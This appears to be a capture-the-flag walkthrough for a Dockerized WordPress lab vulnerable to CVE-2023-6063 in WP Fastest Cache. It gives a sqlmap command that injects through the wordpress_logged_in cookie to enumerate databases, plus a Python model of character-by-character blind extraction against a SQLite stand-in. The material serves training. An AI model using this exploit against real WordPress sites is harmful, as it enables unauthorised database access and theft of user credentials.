IP Address: 172.25.200.200

Port: 9042

Want to run this Docker container locally?

docker run -d -p 9042:80 --restart always --name flag-red61 joshbeck2024/ctf-blind-sql-injection-training-flag-red61

$$ Red61 $$

The target is a WordPress site running the WP Fastest Cache plugin (wp-fastest-cache) in a version affected by CVE-2023-6063, a blind SQL injection reachable through the wordpress_logged_in cookie.

Generally speaking, wpscan would be the tool of choice for plugin enumeration, but it does not detect the plugin installed here, so the fingerprinting has to be done by hand.

If you look at the page source at the bottom of the main page, you'll find the plugin's tell-tale signature: WP Fastest Cache appends an HTML comment of the form `<!-- WP Fastest Cache file was created in ... seconds, on ... -->` to every page it serves from its cache.

Part 1: SQLMap Exploit

Because sqlmap automates both the detection and the exploitation of injection points in applications that fail to sanitize input, the public PoC for this CVE is essentially a single sqlmap invocation.


On Kali, run the command below. The `*` inside the cookie value marks the exact injection point for sqlmap, `--level=2` enables testing of cookie values (sqlmap only tests cookies at level 2 and above), and `--dbs` asks it to enumerate the databases. Because the injection is blind, you'll see the name of each database being derived one character at a time.

sqlmap --dbms=mysql -u "http://IP_OF_TARGET:9042/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --dbs
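To make visible what sqlmap is doing behind its progress bar, the following is an added Python model of the blind extraction; it is not code from the original page, not the plugin's code and not sqlmap's. The target side is an assumption: it mirrors the reported CVE-2023-6063 pattern (the username is split off a `wordpress_logged_in` cookie of the form `user|expiry|token|hmac` and concatenated unescaped into a query), but it uses an in-memory SQLite table named `wp_users` with a constructed `red61admin` row instead of the real MySQL database, and it exposes a boolean oracle (the cache comment disappears when the query returns a row) so the script runs offline. The real target is MySQL, where sqlmap would use `LENGTH`, `ASCII` and `SUBSTRING` in place of SQLite's `length`, `unicode` and `substr`, and may have to fall back to time-based inference if no boolean difference is visible.

```python
import re
import sqlite3

# ---- Target side: a constructed stand-in for the vulnerable plugin ----
# In-memory SQLite table standing in for MySQL's wp_users (constructed rows).
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
_db.execute("INSERT INTO wp_users (user_login, user_pass) VALUES ('red61admin', '$P$B-constructed-hash')")
_db.commit()

# The HTML comment WP Fastest Cache appends to pages served from cache;
# the timing and date here are made up.
CACHED_PAGE = ("<html><body>Hello</body></html>\n"
               "<!-- WP Fastest Cache file was created in 0.112 seconds, on 01-01-24 @ 12:00 -->")


def vulnerable_is_user_admin(cookie_value: str) -> bool:
    """Models the CVE-2023-6063 pattern (assumption, not the plugin's code):
    the username is split off the wordpress_logged_in cookie, whose format is
    'user|expiry|token|hmac', and concatenated unescaped into the query."""
    username = cookie_value.split("|", 1)[0]
    query = "SELECT ID FROM wp_users WHERE user_login = '" + username + "'"
    try:
        return _db.execute(query).fetchone() is not None
    except sqlite3.Error:          # a syntax error just looks like "not logged in"
        return False


def serve(cookies: dict) -> str:
    """Constructed response logic: a recognised logged-in user bypasses the
    cache and gets a page without the cache comment; everyone else gets it."""
    cookie = cookies.get("wordpress_logged_in", "")
    if cookie and vulnerable_is_user_admin(cookie):
        return "<html><body>Hello</body></html>"
    return CACHED_PAGE


# ---- Attacker side ----
_WPFC_SIGNATURE = re.compile(r"<!-- WP Fastest Cache file was created in ")


def fingerprint_wpfc(html: str) -> bool:
    """The manual check from the walkthrough: look for the plugin's comment."""
    return _WPFC_SIGNATURE.search(html) is not None


def oracle(condition: str) -> bool:
    """One boolean-blind request. The injected OR makes the query return a
    row exactly when `condition` is true, which switches the cache comment off."""
    payload = "' OR (" + condition + ")-- "      # trailing space after -- for MySQL
    return not fingerprint_wpfc(serve({"wordpress_logged_in": payload}))


def _binary_search(int_expr: str, lo: int, hi: int, counter: list) -> int:
    """Find the integer value of SQL expression `int_expr` in [lo, hi] with
    ceil(log2(hi - lo + 1)) oracle requests instead of a linear scan."""
    while lo < hi:
        mid = (lo + hi) // 2
        counter[0] += 1
        if oracle(int_expr + " > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(expr: str, max_len: int = 64):
    """Recover the string value of SQL expression `expr` one character at a
    time, the way sqlmap does for a blind injection. Returns (value, requests).
    SQLite functions are used here; on MySQL use LENGTH, ASCII and SUBSTRING."""
    counter = [0]
    length = _binary_search("length(" + expr + ")", 0, max_len, counter)
    chars = []
    for pos in range(1, length + 1):
        code = _binary_search("unicode(substr(" + expr + ", " + str(pos) + ", 1))", 32, 126, counter)
        chars.append(chr(code))
    return "".join(chars), counter[0]


if __name__ == "__main__":
    print("cache signature on anonymous page:", fingerprint_wpfc(serve({})))
    value, n = extract("(SELECT user_login FROM wp_users LIMIT 1)")
    print("extracted %r with %d requests" % (value, n))
```

Each character costs about seven requests with the binary search over printable ASCII, so a ten-character value takes under eighty requests; a linear scan would need up to 95 per character, which is why sqlmap's output appears letter by letter rather than all at once.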
